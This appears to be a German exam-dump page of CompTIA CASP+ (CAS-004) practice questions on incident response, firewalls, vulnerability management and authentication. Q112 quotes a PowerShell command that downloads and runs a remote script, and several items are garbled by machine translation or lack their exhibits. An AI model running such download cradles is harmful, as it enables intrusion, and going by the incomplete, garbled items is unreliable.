CAS-004 Actual Questions Answers PDF 100% Cover Real Exam Questions [Q93-Q115]

Februar 13, 2023Februar 13, 2023 examdumpsCAS-004 Actual Questions Answers PDF 100% Cover Real Exam Questions [Q93-Q115] 0 Kommentar

Schlagwörter: CAS-004 Prüfungsunterlagen, CAS-004 neueste Testkosten, CAS-004 Übung Mock, CAS-004 zuverlässige Antwort auf den echten Test, CAS-004 gültiger Test pass4sure

Diesen Beitrag bewerten

CAS-004 Actual Questions Answers PDF 100% Cover Real Exam Questions

CAS-004 Prüfungsfragen und Antworten

Details zur CompTIA CASP+ Prüfung:

Beispielhafte Fragen	CompTIA CASP+ Beispielfragen
Prüfungspreis	$466 (USD)
Zeitplan Prüfung	CompTIA-Marktplatz Pearson VUE
Dauer	165 Min.
Bücher / Ausbildung	CASP+ CAS-004
Prüfung Name	CompTIA Advanced Security Practitioner (CASP+)
Anzahl der Fragen	90

Q93. Ein Analyst führt einen Schwachstellen-Scan für einen DNS-Server im Internet durch und erhält den folgenden Bericht:

Welches der folgenden Tools sollte der Analyst ZUERST verwenden, um die kritischste Schwachstelle zu validieren?

Passwort-Knacker

Hafen-Scanner

Konto-Zähler

Verwertungsrahmen

Q94. Bei der Untersuchung eines Sicherheitsvorfalls findet ein Analyst Beweise dafür, dass ein Benutzer einen E-Mail-Anhang von einer unbekannten Quelle geöffnet hat. Kurz nachdem der Benutzer den Anhang geöffnet hatte, kam es bei einer Gruppe von Servern zu einer großen Menge an Netzwerk- und Ressourcenaktivitäten. Bei der Untersuchung der Server stellt der Analyst fest, dass die Server durch Ransomware verschlüsselt wurden, die eine Zahlung innerhalb von 48 Stunden fordert, da sonst alle Daten zerstört werden. Das Unternehmen hat keine Reaktionspläne für Ransomware.
Welches ist der NÄCHSTE Schritt, den der Analyst nach der Meldung des Vorfalls an das Managementteam unternehmen sollte?

Zahlen Sie das Lösegeld innerhalb von 48 Stunden.

Isolieren Sie die Server, um eine Ausbreitung zu verhindern.

Benachrichtigen Sie die Strafverfolgungsbehörden.

Fordern Sie, dass die betroffenen Server sofort wiederhergestellt werden.

Q95. Unmittelbar nach der Meldung eines potenziellen Einbruchs erstellt ein Sicherheitstechniker ein forensisches Image des betreffenden Servers als Teil des Verfahrens zur Reaktion auf einen Vorfall im Unternehmen. Was muss geschehen, um die Integrität des Abbilds zu gewährleisten?

Das Bild muss durch ein Passwort gegen Änderungen geschützt werden.

Es muss ein Hash-Wert des Bildes berechnet werden.

Der Datenträger, der das Abbild enthält, muss in einem festsitzenden Behälter untergebracht werden.

Ein Duplikat des Bildes muss aufbewahrt werden.

Q96. Ein Sicherheitsarchitekt prüft die folgende vorgeschlagene Architektur und Konfiguration der Unternehmensfirewall:

Beide Firewalls sind zustandsorientiert und bieten Layer-7-Filterung und -Routing. Das Unternehmen hat die folgenden Anforderungen:
Webserver müssen alle Aktualisierungen über HTTP/S aus dem Unternehmensnetz erhalten.
Webserver sollten keine Kommunikation mit dem Internet initiieren.
Webserver sollten nur mit vorher genehmigten Datenbankservern des Unternehmens verbunden werden.
Die Computer der Mitarbeiter sollten sich nur über die Ports 80 und 443 mit Webdiensten verbinden.
Welche der folgenden Optionen sollte der Architekt empfehlen, um sicherzustellen, dass alle Anforderungen auf die sicherste Weise erfüllt werden? (Wählen Sie zwei aus.)

Fügen Sie Folgendes zu Firewall_A hinzu: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443

Fügen Sie Folgendes zu Firewall_A hinzu: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443

Fügen Sie Folgendes zu Firewall_A hinzu: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535

Fügen Sie der Firewall_B Folgendes hinzu: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535

Fügen Sie der Firewall_B Folgendes hinzu: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535

Fügen Sie der Firewall_B Folgendes hinzu: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443

Q97. Der Chief Information Officer (CIO) einer großen Bank, die für die Erbringung einer Dienstleistung mehrere Drittanbieter einsetzt, ist besorgt über den Umgang mit und die Sicherheit von Kundendaten durch die Beteiligten. Welche der folgenden Maßnahmen sollten ergriffen werden, um das Risiko am besten zu beherrschen?

Einrichtung eines Überprüfungsausschusses, der die Bedeutung der Lieferanten bewertet und sie in eine Rangfolge für die Vertragsverlängerung bringt. Nehmen Sie zum Zeitpunkt der Vertragserneuerung Konstruktions- und Betriebskontrollen in die Verträge auf und verankern Sie eine Klausel über das Recht auf Audits. Regelmäßige Bewertung der Lieferanten nach der Vertragserneuerung durch ein spezielles Risikomanagementteam.

Bilden Sie ein Team aus Mitgliedern der ersten Risikoklasse, der Geschäftseinheit und des Lieferantenmanagements, um die Sicherheitskontrollen aller Lieferanten zu bewerten. Speichern Sie die Ergebnisse der Prüfungen in einer Datenbank, auf die alle anderen Geschäftsbereiche und Risikoteams zugreifen können.

Einführung eines Audit-Programms, das regelmäßig alle Zulieferer überprüft, unabhängig davon, auf welche Daten sie zugreifen, wie sie auf die Daten zugreifen und welche Art von Daten sie haben, Überprüfung aller Entwurfs- und Betriebskontrollen auf der Grundlage des Best-Practice-Standards und Meldung der Ergebnisse an die obere Führungsebene.

Einrichtung eines Governance-Programms, das Lieferanten auf der Grundlage ihres Datenzugriffs, der Art der Daten und der Art des Datenzugriffs einstuft Schlüsselkontrollen zuweist, die auf der Grundlage der Lieferanteneinstufung überprüft und verwaltet werden. Berichterstattung über die Ergebnisse von Einheiten, die sich auf die Lieferanten und die verschiedenen Risikoteams verlassen.

Q98. Eine Organisation plant die Wiederherstellung und Kontinuität des Betriebs im Katastrophenfall.
ANLEITUNGEN
Gehen Sie die folgenden Szenarien und Anweisungen durch. Ordnen Sie jeden relevanten Befund dem betroffenen Host zu.
Nachdem Sie Szenario 3 mit dem/den entsprechenden Host(s) verknüpft haben, klicken Sie auf den Host, um die entsprechende Abhilfemaßnahme für diesen Befund auszuwählen.
Jedes Ergebnis kann mehr als einmal verwendet werden.
Wenn Sie zu einem beliebigen Zeitpunkt den Ausgangszustand der Simulation wiederherstellen möchten, klicken Sie bitte auf die Schaltfläche Alles zurücksetzen.

Q99. Ein Sicherheitsanalytiker prüft den folgenden Bericht zur Bewertung der Schwachstellen:

Welcher der folgenden Punkte sollte ZUERST gepatcht werden, um Angriffe auf Hosts mit Internetanschluss zu minimieren?

Server1

Server2

Server 3

Server

Q100. Ein Unternehmen vermutet, dass ein Webserver von einem konkurrierenden Unternehmen infiltriert worden ist. Der Sicherheitsingenieur prüft die Webserverprotokolle und stellt Folgendes fest:

Der Sicherheitsingenieur sieht sich den Code zusammen mit einem Entwickler an und stellt fest, dass der Protokolleintrag erstellt wird, wenn die folgende Zeile ausgeführt wird:

Welche der folgenden Sicherheitsmaßnahmen sollte das Unternehmen durchführen?

Beschränken Sie die Verzeichnisberechtigung auf reinen Lesezugriff.

Verwenden Sie die serverseitige Verarbeitung, um XSS-Schwachstellen in Pfadeingaben zu vermeiden.

Trennen Sie die Elemente im Systemaufruf, um eine Befehlsinjektion zu verhindern.

Parametrisieren Sie eine Abfrage in der Pfadvariable, um SQL-Injection zu verhindern.

Q101. Den Mitarbeitern eines Unternehmens ist es nicht gestattet, von internationalen Reisen aus auf die Systeme des Unternehmens zuzugreifen. Das E-Mail-System des Unternehmens ist so konfiguriert, dass Logins auf der Grundlage des geografischen Standorts blockiert werden, aber einige Mitarbeiter berichten, dass ihre Mobiltelefone auf Reisen weiterhin E-Mails synchronisieren. Welcher der folgenden Fälle ist am wahrscheinlichsten? (Wählen Sie ZWEI.)

Überholter Eskalationsangriff

Angriff auf die Privilegienerweiterung

VPN auf dem mobilen Gerät

Uneingeschränkte E-Mail-Administratorkonten

Hauptverwendung von UDP-Protokollen

Deaktiviertes GPS auf mobilen Geräten

Q102. Ein Unternehmen möchte seine Cybersicherheitsmaßnahmen verstärken und konzentriert sich dabei auf seine Netzwerkinfrastruktur. Die Lösung darf die Verfügbarkeit der Dienste des Unternehmens nicht beeinträchtigen, um sicherzustellen, dass Falschmeldungen nicht den legitimen Datenverkehr beeinträchtigen.
Welche der folgenden Möglichkeiten würde diese Anforderung erfüllen?

NIDS

NIPS

WAF

Umgekehrter Proxy

Referenz:
https://owasp.org/www-community/controls/Intrusion_Detection

Q103. Ein Sicherheitsanalytiker untersucht eine Reihe von verdächtigen E-Mails, die von Mitarbeitern an das Sicherheitsteam geschickt wurden. Die E-Mails scheinen von einem aktuellen Geschäftspartner zu stammen und enthalten keine Bilder oder URLs. Die Sicherheitstools, die das Unternehmen einsetzt, haben keine Bilder oder URLs aus den Nachrichten entfernt, stattdessen enthalten die E-Mails nur den folgenden Text im Klartext.

Welche der folgenden Aufgaben sollte der Sicherheitsanalytiker durchführen?

Wenden Sie sich an die Sicherheitsabteilung des Geschäftspartners und machen Sie sie auf das E-Mail-Ereignis aufmerksam.

Sperren Sie die IP-Adresse des Geschäftspartners an der Perimeter-Firewall.

Ziehen Sie die Geräte der betroffenen Mitarbeiter aus dem Netz, falls sie mit einem Zero-Day-Virus infiziert sind.

Konfigurieren Sie das E-Mail-Gateway so, dass alle vom Geschäftspartner stammenden Nachrichten automatisch unter Quarantäne gestellt werden.

Q104. In einer Webanwendung wurde eine hochgradig gefährliche Sicherheitslücke gefunden und in das Unternehmen eingeschleust. Die Schwachstelle könnte es einem unbefugten Benutzer ermöglichen, eine Open-Source-Bibliothek zu nutzen, um privilegierte Benutzerinformationen einzusehen. Das Unternehmen ist nicht bereit, dieses Risiko einzugehen, aber die Entwickler können das Problem nicht sofort beheben.
Welche der folgenden Maßnahmen sollten ergriffen werden, um das Risiko auf ein akzeptables Niveau zu reduzieren, bis das Problem behoben werden kann?

Scannen Sie den Code mit einem statischen Codeanalysator, ändern Sie die Kennwörter privilegierter Benutzer und führen Sie Sicherheitsschulungen durch.

Ändern Sie privilegierte Benutzernamen, überprüfen Sie die Betriebssystemprotokolle und setzen Sie Hardware-Tokens ein.

Implementieren Sie MFA, überprüfen Sie die Anwendungsprotokolle, und setzen Sie eine WAF ein.

Stellen Sie ein VPN bereit, konfigurieren Sie ein offizielles Open-Source-Bibliotheks-Repository und führen Sie eine vollständige Überprüfung der Anwendung auf Sicherheitslücken durch.

Q105. Das SOC eines Unternehmens hat Bedrohungsdaten über eine aktive Kampagne erhalten, die eine bestimmte Schwachstelle ausnutzt.
Das Unternehmen möchte feststellen, ob es durch diese aktive Kampagne gefährdet ist.
Welche der folgenden Möglichkeiten sollte das Unternehmen nutzen, um diese Entscheidung zu treffen?

Jagd auf Bedrohungen

Ein Systempenetrationstest

Protokollanalyse innerhalb des SIEM-Tools

Die Cyber-Kill-Chain

Q106. Ein Auditor überprüft die Protokolle einer Webanwendung, um die Quelle eines Vorfalls zu ermitteln. Die Architektur der Webanwendung umfasst einen über das Internet zugänglichen Anwendungs-Load-Balancer, eine Reihe von Webservern in einem privaten Subnetz, Anwendungsserver und einen Datenbankserver in einer mehrstufigen Konfiguration. Der Application Load Balancer kann die Protokolle nicht speichern. Im Folgenden finden Sie Beispiele für Protokollausschnitte:

Welche der folgenden Empfehlungen sollte der Prüfer aussprechen, um sicherzustellen, dass zukünftige Vorfälle zu den Quellen zurückverfolgt werden können?

Aktivieren Sie den x-Forwarded-For-Header für den Load Balancer.

Installieren Sie ein softwarebasiertes HIDS auf den Anwendungsservern.

Installieren Sie ein von einer vertrauenswürdigen CA signiertes Zertifikat.

Verwenden Sie gespeicherte Prozeduren auf dem Datenbankserver.

Speichern Sie den Wert des von den Webservern empfangenen $_server ( ' REMOTE_ADDR ' ].

Q107. Ein Entwickler erstellt eine neue mobile Anwendung für ein Unternehmen. Die Anwendung verwendet REST API und TLS 1.2 für die sichere Kommunikation mit dem externen Backend-Server. Aufgrund dieser Konfiguration ist das Unternehmen besorgt über HTTPS-Abfangangriffe.
Welche der folgenden Möglichkeiten wäre die BESTE Lösung gegen diese Art von Angriffen?

Wildcard-Zertifikate

HSTS

Anheften des Zertifikats

Q108. Ein Schwachstellenanalytiker hat eine Zero-Day-Schwachstelle in der intern entwickelten Software eines Unternehmens entdeckt. Da das derzeitige Schwachstellenmanagementsystem keine Prüfungen für diese Schwachstelle enthält, wurde ein Ingenieur gebeten, eine solche zu erstellen.
Welche der folgenden Möglichkeiten wäre am besten geeignet, um diese Anforderungen zu erfüllen?

ARF

ISACs

Node.js

OVAL

Q109. Welches ist das wichtigste Sicherheitsziel bei der Anwendung von Kryptographie auf Kontrollmeldungen, die einem ICS mitteilen, wie viel Strom es ausgeben soll?

Importieren der Verfügbarkeit von Nachrichten

Sicherstellung der Unleugbarkeit von Nachrichten

Durchsetzung der Protokollkonformität für Nachrichten

Sicherstellung der Integrität von Nachrichten

Q110. Quellen für Geräteereignisprotokolle von der MDM-Software wie folgt:

Welche der folgenden Sicherheitsbedenken und Reaktionsmaßnahmen würden die Risiken, die von dem Gerät in den Protokollen ausgehen, am BESTEN angehen?

Böswillige Installation einer Anwendung; ändern Sie die MDM-Konfiguration, um die Anwendungs-ID 1220 zu entfernen.

Ressourcenleck; Wiederherstellung des Geräts zur Analyse und Bereinigung des lokalen Speichers.

Unmögliches Reisen; deaktivieren Sie das Konto des Geräts und den Zugang während der Ermittlungen.

Gefälschte Statusmeldungen; Löschen des Geräts aus der Ferne.

Q111. Ein Sicherheitsanalytiker bemerkt eine Reihe von SIEM-Ereignissen, die die folgende Aktivität zeigen:

Welche der folgenden Reaktionsmaßnahmen sollte der Analyst ZUERST ergreifen?

Deaktivieren Sie powershell.exe auf allen Microsoft Windows-Endpunkten.

Starten Sie Microsoft Windows Defender neu.

Konfigurieren Sie den Forward Proxy so, dass er 40.90.23.154 blockiert.

Deaktivieren Sie lokale Administratorrechte auf den Endpunkten.

Q112. Ein Sicherheitsanalytiker hat einen stetigen Anstieg der Anzahl der fehlgeschlagenen Anmeldeversuche bei einem externen Mailserver festgestellt. Bei der Untersuchung einer der Sprungboxen stellte der Analyst in der Protokolldatei Folgendes fest: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois
Welche der folgenden Sicherheitskontrollen hätte die nächste Phase des Angriffs gewarnt und verhindert?

Antivirus und UEBA

Reverse-Proxy und Sandbox

EDR und Liste der genehmigten Anwendungen

Weiterleitungsproxy und MFA

Ein EDR und eine Whitelist sollten vor diesem Angriff schützen.

Q113. Ein Unternehmen wird immer wieder von Hackern angegriffen, die sich gültige Zugangsdaten verschaffen. Der Chief Information Security Officer (CISO) des Unternehmens hat mehrere Kontrollmechanismen für die Benutzerauthentifizierung installiert, darunter biometrische und tokenbasierte Faktoren. Jede weitere Kontrolle hat den Aufwand und die Komplexität erhöht, konnte aber weitere Einbrüche nicht verhindern. Ein externer Berater evaluiert den Prozess, der derzeit zur Unterstützung der Authentifizierungskontrollen eingesetzt wird. Welche der folgenden Empfehlungen würde das Risiko eines unbefugten Zugriffs am ehesten verringern?

Einführung einer strengen Drei-Faktor-Authentifizierung.

Umsetzung von Least-Privilege-Richtlinien

Wechseln Sie zu einmaligen oder allen Benutzerberechtigungen.

Stärkung der Verfahren zur Identitätssicherung

Q114. Ein Endpunkt zur Schwachstellenbewertung hat einen Bericht mit den neuesten Erkenntnissen erstellt. Ein Sicherheitsanalytiker muss den Bericht prüfen und eine Prioritätenliste der zu bearbeitenden Punkte erstellen. Welche der folgenden Möglichkeiten sollte der Analyst nutzen, um die Liste schnell zu erstellen?

Bewertung der Auswirkungen auf das Geschäft

CVE-Daten

CVSS-Bewertungen

OVAL

Q115. Ein Unternehmen möchte sein geistiges Eigentum vor Diebstahl schützen. Das Unternehmen hat bereits ACLs und DACs eingesetzt.
Welche der folgenden Maßnahmen sollte das Unternehmen ergreifen, um Datendiebstahl zu verhindern?

Wasserzeichen

DRM

NDA

Zugangsprotokollierung

Laden …